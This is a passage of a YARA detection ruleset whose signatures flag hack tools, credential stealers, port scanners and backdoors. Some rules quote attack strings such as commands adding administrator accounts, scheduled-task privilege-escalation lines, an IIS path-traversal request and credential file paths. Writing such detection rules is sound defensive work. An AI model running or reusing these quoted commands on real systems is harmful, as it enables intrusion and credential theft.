uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_IP6DNS { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_IP6DNS" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_ARP { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_ARP" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_C2Bridge { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/cobbr/C2Bridge" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "C2Bridge" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Infrastructure_Assessment { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Infrastructure-Assessment" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_shellcodeTester { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/tophertimzen/shellcodeTester" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "shellcodeTester" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_gray_hat_csharp_code { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/brandonprry/gray_hat_csharp_code" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "gray_hat_csharp_code" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_ReverseShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_ReverseShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_DotNetAVBypass { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/mandreko/DotNetAVBypass" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "DotNetAVBypass" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_HexyRunner { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/bao7uo/HexyRunner" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "HexyRunner" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpOffensiveShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/darkr4y/SharpOffensiveShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpOffensiveShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_reconness { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/reconness/reconness" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "reconness" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_tvasion { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/loadenmb/tvasion" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "tvasion" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ibombshell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Telefonica/ibombshell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ibombshell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RemoteProcessInjection { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RemoteProcessInjection" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_njRAT_0_7d_Stub_CSharp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/NYAN-x-CAT/njRAT-0.7d-Stub-CSharp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "njRAT-0.7d-Stub-CSharp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_CACTUSTORCH { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/mdsecactivebreach/CACTUSTORCH" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "CACTUSTORCH" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_PandaSniper { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/QAX-A-Team/PandaSniper" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "PandaSniper" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_xbapAppWhitelistBypassPOC { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "xbapAppWhitelistBypassPOC" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_StageStrike { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/RedXRanger/StageStrike" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "StageStrike" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule HKTL_Solarwinds_credential_stealer { meta: description = "Detects solarwinds credential stealers like e.g. solarflare via the touched certificate, files and database columns" reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" reference = "https://github.com/mubix/solarflare" author = "Arnim Rupp" date = "2021-01-20" hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4" hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc" strings: $certificate = "CN=SolarWinds-Orion" ascii nocase wide $credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii nocase wide $credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii nocase wide $credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii nocase wide $credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii nocase wide $sql1 = "encryptedkey" ascii nocase wide fullword $sql2 = "protectiontype" ascii nocase wide fullword $sql3 = "CredentialProperty" ascii nocase wide fullword $sql4 = "passwordhash" ascii nocase wide fullword $sql5 = "credentialtype" ascii nocase wide fullword $sql6 = "passwordsalt" ascii nocase wide fullword condition: uint16(0) == 0x5A4D and $certificate and ( 2 of ( $credfile* ) or 5 of ( $sql* ) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* THOR APT Scanner - Hack Tool Extract This rulset is a subset of all hack tool rules included in our APT Scanner THOR - the full featured APT scanner. We will frequently update this file with new rules rated TLP:WHITE Florian Roth BSK Consulting GmbH Web: bsk-consulting.de revision: 20150510 License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) Copyright and related rights waived via https://creativecommons.org/licenses/by-nc-sa/4.0/ */ /* WCE */ rule WindowsCredentialEditor { meta: description = "Windows Credential Editor" threat_level = 10 score = 90 strings: $a = "extract the TGT session key" $b = "Windows Credentials Editor" condition: $a or $b } rule Amplia_Security_Tool { meta: description = "Amplia Security Tool" score = 60 nodeepdive = 1 strings: $a = "Amplia Security" $b = "Hernan Ochoa" $c = "getlsasrvaddr.exe" $d = "Cannot get PID of LSASS.EXE" $e = "extract the TGT session key" $f = "PPWDUMP_DATA" condition: 1 of them } /* pwdump/fgdump */ rule PwDump { meta: description = "PwDump 6 variant" author = "Marc Stroebel" date = "2014-04-24" score = 70 strings: $s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa" $s6 = "Unable to query service status. Something is wrong, please manually check the st" $s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword condition: all of them } rule PScan_Portscan_1 { meta: description = "PScan - Port Scanner" author = "F. Roth" score = 50 strings: $a = "00050;0F0M0X0a0v0}0" $b = "vwgvwgvP76" $c = "Pr0PhOFyP" condition: all of them } rule HackTool_Samples { meta: description = "Hacktool" score = 50 strings: $a = "Unable to uninstall the fgexec service" $b = "Unable to set socket to sniff" $c = "Failed to load SAM functions" $d = "Dump system passwords" $e = "Error opening sam hive or not valid file" $f = "Couldn't find LSASS pid" $g = "samdump.dll" $h = "WPEPRO SEND PACKET" $i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4" $j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE" $k = "arpspoof\\Debug" $l = "Success: The log has been cleared" $m = "clearlogs [\\\\computername" $n = "DumpUsers 1." $o = "dictionary attack with specified dictionary file" $p = "by Objectif Securite" $q = "objectif-securite" $r = "Cannot query LSA Secret on remote host" $s = "Cannot write to process memory on remote host" $t = "Cannot start PWDumpX service on host" $u = "usage: %s <system hive> <security hive>" $v = "username:domainname:LMhash:NThash" $w = "<server_name_or_ip> | -f <server_list_file> [username] [password]" $x = "Impersonation Tokens Available" $y = "failed to parse pwdump format string" $z = "Dumping password" condition: 1 of them } /* Disclosed hack tool set */ rule Fierce2 { meta: author = "Florian Roth" description = "This signature detects the Fierce2 domain scanner" date = "07/2014" score = 60 strings: $s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars," condition: 1 of them } rule Ncrack { meta: author = "Florian Roth" description = "This signature detects the Ncrack brute force tool" date = "07/2014" score = 60 strings: $s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via" condition: 1 of them } rule SQLMap { meta: author = "Florian Roth" description = "This signature detects the SQLMap SQL injection tool" date = "07/2014" score = 60 strings: $s1 = "except SqlmapBaseException, ex:" condition: 1 of them } rule PortScanner { meta: description = "Auto-generated rule on file PortScanner.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "b381b9212282c0c650cb4b0323436c63" strings: $s0 = "Scan Ports Every" $s3 = "Scan All Possible Ports!" condition: all of them } rule DomainScanV1_0 { meta: description = "Auto-generated rule on file DomainScanV1_0.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "aefcd73b802e1c2bdc9b2ef206a4f24e" strings: $s0 = "dIJMuX$aO-EV" $s1 = "XELUxP\"-\\" $s2 = "KaR\"U'}-M,." $s3 = "V.)\\ZDxpLSav" $s4 = "Decompress error" $s5 = "Can't load library" $s6 = "Can't load function" $s7 = "com0tl32:.d" condition: all of them } rule MooreR_Port_Scanner { meta: description = "Auto-generated rule on file MooreR Port Scanner.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "376304acdd0b0251c8b19fea20bb6f5b" strings: $s0 = "Description|" $s3 = "soft Visual Studio\\VB9yp" $s4 = "adj_fptan?4" $s7 = "DOWS\\SyMem32\\/o" condition: all of them } rule NetBIOS_Name_Scanner { meta: description = "Auto-generated rule on file NetBIOS Name Scanner.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "888ba1d391e14c0a9c829f5a1964ca2c" strings: $s0 = "IconEx" $s2 = "soft Visual Stu" $s4 = "NBTScanner!y&" condition: all of them } rule FeliksPack3___Scanners_ipscan { meta: description = "Auto-generated rule on file ipscan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "6c1bcf0b1297689c8c4c12cc70996a75" strings: $s2 = "WCAP;}ECTED" $s4 = "NotSupported" $s6 = "SCAN.VERSION{_" condition: all of them } rule CGISscan_CGIScan { meta: description = "Auto-generated rule on file CGIScan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "338820e4e8e7c943074d5a5bc832458a" strings: $s1 = "Wang Products" fullword wide $s2 = "WSocketResolveHost: Cannot convert host address '%s'" $s3 = "tcp is the only protocol supported thru socks server" condition: all of ($s*) } rule IP_Stealing_Utilities { meta: description = "Auto-generated rule on file IP Stealing Utilities.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "65646e10fb15a2940a37c5ab9f59c7fc" strings: $s0 = "DarkKnight" $s9 = "IPStealerUtilities" condition: all of them } rule SuperScan4 { meta: description = "Auto-generated rule on file SuperScan4.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "78f76428ede30e555044b83c47bc86f0" strings: $s2 = " td class=\"summO1\">" $s6 = "REM'EBAqRISE" $s7 = "CorExitProcess'msc#e" condition: all of them } rule PortRacer { meta: description = "Auto-generated rule on file PortRacer.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "2834a872a0a8da5b1be5db65dfdef388" strings: $s0 = "Auto Scroll BOTH Text Boxes" $s4 = "Start/Stop Portscanning" $s6 = "Auto Save LogFile by pressing STOP" condition: all of them } rule scanarator { meta: description = "Auto-generated rule on file scanarator.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "848bd5a518e0b6c05bd29aceb8536c46" strings: $s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" condition: all of them } rule aolipsniffer { meta: description = "Auto-generated rule on file aolipsniffer.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "51565754ea43d2d57b712d9f0a3e62b8" strings: $s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB" $s1 = "dwGetAddressForObject" $s2 = "Color Transfer Settings" $s3 = "FX Global Lighting Angle" $s4 = "Version compatibility info" $s5 = "New Windows Thumbnail" $s6 = "Layer ID Generator Base" $s7 = "Color Halftone Settings" $s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca" condition: all of them } rule _Bitchin_Threads_ { meta: description = "Auto-generated rule on file =Bitchin Threads=.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "7491b138c1ee5a0d9d141fbfd1f0071b" strings: $s0 = "DarKPaiN" $s1 = "=BITCHIN THREADS" condition: all of them } rule cgis4_cgis4 { meta: description = "Auto-generated rule on file cgis4.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "d658dad1cd759d7f7d67da010e47ca23" strings: $s0 = ")PuMB_syJ" $s1 = "&,fARW>yR" $s2 = "m3hm3t_rullaz" $s3 = "7Projectc1" $s4 = "Ten-GGl\"" $s5 = "/Moziqlxa" condition: all of them } rule portscan { meta: description = "Auto-generated rule on file portscan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "a8bfdb2a925e89a281956b1e3bb32348" strings: $s5 = "0 :SCAN BEGUN ON PORT:" $s6 = "0 :PORTSCAN READY." condition: all of them } rule ProPort_zip_Folder_ProPort { meta: description = "Auto-generated rule on file ProPort.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "c1937a86939d4d12d10fc44b7ab9ab27" strings: $s0 = "Corrupt Data!" $s1 = "K4p~omkIz" $s2 = "DllTrojanScan" $s3 = "GetDllInfo" $s4 = "Compressed by Petite (c)1999 Ian Luck." $s5 = "GetFileCRC32" $s6 = "GetTrojanNumber" $s7 = "TFAKAbout" condition: all of them } rule StealthWasp_s_Basic_PortScanner_v1_2 { meta: description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "7c0f2cab134534cd35964fe4c6a1ff00" strings: $s1 = "Basic PortScanner" $s6 = "Now scanning port:" condition: all of them } rule BluesPortScan { meta: description = "Auto-generated rule on file BluesPortScan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "6292f5fc737511f91af5e35643fc9eef" strings: $s0 = "This program was made by Volker Voss" $s1 = "JiBOo~SSB" condition: all of them } rule scanarator_iis { meta: description = "Auto-generated rule on file iis.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "3a8fc02c62c8dd65e038cc03e5451b6e" strings: $s0 = "example: iis 10.10.10.10" $s1 = "send error" condition: all of them } rule stealth_Stealth { meta: description = "Auto-generated rule on file Stealth.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa" strings: $s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>" $s6 = "This tool may be used only by system administrators. I am not responsible for " condition: all of them } rule Angry_IP_Scanner_v2_08_ipscan { meta: description = "Auto-generated rule on file ipscan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "70cf2c09776a29c3e837cb79d291514a" strings: $s0 = "_H/EnumDisplay/" $s5 = "ECTED.MSVCRT0x" $s8 = "NotSupported7" condition: all of them } rule crack_Loader { meta: description = "Auto-generated rule on file Loader.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "f4f79358a6c600c1f0ba1f7e4879a16d" strings: $s0 = "NeoWait.exe" $s1 = "RRRRRRRW" condition: all of them } rule CN_GUI_Scanner { meta: description = "Detects an unknown GUI scanner tool - CN background" author = "Florian Roth" hash = "3c67bbb1911cdaef5e675c56145e1112" score = 65 date = "04.10.2014" strings: $s1 = "good.txt" fullword ascii $s2 = "IP.txt" fullword ascii $s3 = "xiaoyuer" fullword ascii $s0w = "ssh(" fullword wide $s1w = ").exe" fullword wide condition: all of them } rule CN_Packed_Scanner { meta: description = "Suspiciously packed executable" author = "Florian Roth" hash = "6323b51c116a77e3fba98f7bb7ff4ac6" score = 40 date = "06.10.2014" strings: $s1 = "kernel32.dll" fullword ascii $s2 = "CRTDLL.DLL" fullword ascii $s3 = "__GetMainArgs" fullword ascii $s4 = "WS2_32.DLL" fullword ascii condition: all of them and filesize < 180KB and filesize > 70KB } rule Tiny_Network_Tool_Generic { meta: description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)" author = "Florian Roth" date = "08.10.2014" score = 40 type = "file" hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07" hash1 = "cafc31d39c1e4721af3ba519759884b9" hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92" strings: $magic = { 4d 5a } $s0 = "KERNEL32.DLL" fullword ascii $s1 = "CRTDLL.DLL" fullword ascii $s3 = "LoadLibraryA" fullword ascii $s4 = "GetProcAddress" fullword ascii $y1 = "WININET.DLL" fullword ascii $y2 = "atoi" fullword ascii $x1 = "ADVAPI32.DLL" fullword ascii $x2 = "USER32.DLL" fullword ascii $x3 = "wsock32.dll" fullword ascii $x4 = "FreeSid" fullword ascii $x5 = "atoi" fullword ascii $z1 = "ADVAPI32.DLL" fullword ascii $z2 = "USER32.DLL" fullword ascii $z3 = "FreeSid" fullword ascii $z4 = "ToAscii" fullword ascii condition: ( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB } rule Beastdoor_Backdoor { meta: description = "Detects the backdoor Beastdoor" author = "Florian Roth" score = 55 hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a" strings: $s0 = "Redirect SPort RemoteHost RPort -->Port Redirector" fullword $s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword $s2 = "http://IP/a.exe a.exe -->Download A File" fullword $s7 = "Host: wwp.mirabilis.com:80" fullword $s8 = "%s -Set Port PortNumber -->Set The Service Port" fullword $s11 = "Shell -->Get A Shell" fullword $s14 = "DeleteService ServiceName -->Delete A Service" fullword $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword $s17 = "%s -Set ServiceName ServiceName -->Set The Service Name" fullword condition: 2 of them } rule Powershell_Netcat { meta: description = "Detects a Powershell version of the Netcat network hacking tool" author = "Florian Roth" score = 60 date = "10.10.2014" strings: $s0 = "[ValidateRange(1, 65535)]" fullword $s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword $s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword condition: all of them } rule Chinese_Hacktool_1014 { meta: description = "Detects a chinese hacktool with unknown use" author = "Florian Roth" score = 60 date = "10.10.2014" hash = "98c07a62f7f0842bcdbf941170f34990" strings: $s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide $s1 = "msctls_progress32" fullword wide $s2 = "Reply-To: %s" fullword ascii $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii $s4 = "html htm htx asp" fullword ascii condition: all of them } rule CN_Hacktool_BAT_PortsOpen { meta: description = "Detects a chinese BAT hacktool for local port evaluation" author = "Florian Roth" score = 60 date = "12.10.2014" strings: $s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii $s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii $s2 = "@echo off" ascii condition: all of them } rule CN_Hacktool_SSPort_Portscanner { meta: description = "Detects a chinese Portscanner named SSPort" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = "Golden Fox" fullword wide $s1 = "Syn Scan Port" fullword wide $s2 = "CZ88.NET" fullword wide condition: all of them } rule CN_Hacktool_ScanPort_Portscanner { meta: description = "Detects a chinese Portscanner named ScanPort" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = "LScanPort" fullword wide $s1 = "LScanPort Microsoft" fullword wide $s2 = "www.yupsoft.com" fullword wide condition: all of them } rule CN_Hacktool_S_EXE_Portscanner { meta: description = "Detects a chinese Portscanner named s.exe" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = "\\Result.txt" fullword ascii $s1 = "By:ZT QQ:376789051" fullword ascii $s2 = "(http://www.eyuyan.com)" fullword wide condition: all of them } rule CN_Hacktool_MilkT_BAT { meta: description = "Detects a chinese Portscanner named MilkT - shipped BAT" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii $s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii condition: all of them } rule CN_Hacktool_MilkT_Scanner { meta: description = "Detects a chinese Portscanner named MilkT" author = "Florian Roth" score = 60 date = "12.10.2014" strings: $s0 = "Bf **************" ascii fullword $s1 = "forming Time: %d/" ascii $s2 = "KERNEL32.DLL" ascii fullword $s3 = "CRTDLL.DLL" ascii fullword $s4 = "WS2_32.DLL" ascii fullword $s5 = "GetProcAddress" ascii fullword $s6 = "atoi" ascii fullword condition: all of them } rule CN_Hacktool_1433_Scanner { meta: description = "Detects a chinese MSSQL scanner" author = "Florian Roth" score = 40 date = "12.10.2014" strings: $magic = { 4d 5a } $s0 = "1433" wide fullword $s1 = "1433V" wide $s2 = "del Weak1.txt" ascii fullword $s3 = "del Attack.txt" ascii fullword $s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii $s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii condition: ( $magic at 0 ) and all of ($s*) } rule CN_Hacktool_1433_Scanner_Comp2 { meta: description = "Detects a chinese MSSQL scanner - component 2" author = "Florian Roth" score = 40 date = "12.10.2014" strings: $magic = { 4d 5a } $s0 = "1433" wide fullword $s1 = "1433V" wide $s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword condition: ( $magic at 0 ) and all of ($s*) } rule WCE_Modified_1_1014 { meta: description = "Modified (packed) version of Windows Credential Editor" author = "Florian Roth" hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354" score = 70 strings: $s0 = "LSASS.EXE" fullword ascii $s1 = "_CREDS" ascii $s9 = "Using WCE " ascii condition: all of them } rule ReactOS_cmd_valid { meta: description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset" author = "Florian Roth" date = "05.11.14" reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php" score = 30 hash = "b88f050fa69d85af3ff99af90a157435296cbb6e" strings: $s1 = "ReactOS Command Processor" fullword wide $s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide $s3 = "Eric Kohl and others" fullword wide $s4 = "ReactOS Operating System" fullword wide condition: all of ($s*) } rule iKAT_wmi_rundll { meta: description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe" author = "Florian Roth" date = "05.11.14" score = 65 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "97c4d4e6a644eed5aa12437805e39213e494d120" strings: $s0 = "This operating system is not supported." fullword ascii $s1 = "Error!" fullword ascii $s2 = "Win32 only!" fullword ascii $s3 = "COMCTL32.dll" fullword ascii $s4 = "[LordPE]" ascii $s5 = "CRTDLL.dll" fullword ascii $s6 = "VBScript" fullword ascii $s7 = "CoUninitialize" fullword ascii condition: all of them and filesize < 15KB } rule iKAT_revelations { meta: description = "iKAT hack tool showing the content of password fields - file revelations.exe" author = "Florian Roth" date = "05.11.14" score = 75 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "c4e217a8f2a2433297961561c5926cbd522f7996" strings: $s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii $s8 = "BETAsupport@snadboy.com" fullword wide $s9 = "support@snadboy.com" fullword wide $s14 = "RevelationHelper.dll" fullword ascii condition: all of them } rule iKAT_priv_esc_tasksch { meta: description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista." author = "Florian Roth" date = "05.11.14" score = 75 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b" strings: $s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii $s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii $s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii $s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii $s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii $s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii $s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii $s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii $s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii $s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii $s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii $s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii $s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii condition: 2 of them } rule iKAT_command_lines_agent { meta: description = "iKAT hack tools set agent - file ikat.exe" author = "Florian Roth" date = "05.11.14" score = 75 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94" strings: $s0 = "Extended Module: super mario brothers" fullword ascii $s1 = "Extended Module: " fullword ascii $s3 = "ofpurenostalgicfeeling" fullword ascii $s8 = "-supermariobrotheretic" fullword ascii $s9 = "!http://132.147.96.202:80" fullword ascii $s12 = "iKAT Exe Template" fullword ascii $s15 = "withadancyflavour.." fullword ascii $s16 = "FastTracker v2.00 " fullword ascii condition: 4 of them } rule iKAT_cmd_as_dll { meta: description = "iKAT toolset file cmd.dll ReactOS file cloaked" author = "Florian Roth" date = "05.11.14" score = 65 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a" strings: $s1 = "cmd.exe" fullword wide $s2 = "ReactOS Development Team" fullword wide $s3 = "ReactOS Command Processor" fullword wide $ext = "extension: .dll" nocase condition: all of ($s*) and $ext } rule iKAT_tools_nmap { meta: description = "Generic rule for NMAP - based on NMAP 4 standalone" author = "Florian Roth" date = "05.11.14" score = 50 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "d0543f365df61e6ebb5e345943577cc40fca8682" strings: $s0 = "Insecure.Org" fullword wide $s1 = "Copyright (c) Insecure.Com" fullword wide $s2 = "nmap" fullword nocase $s3 = "Are you 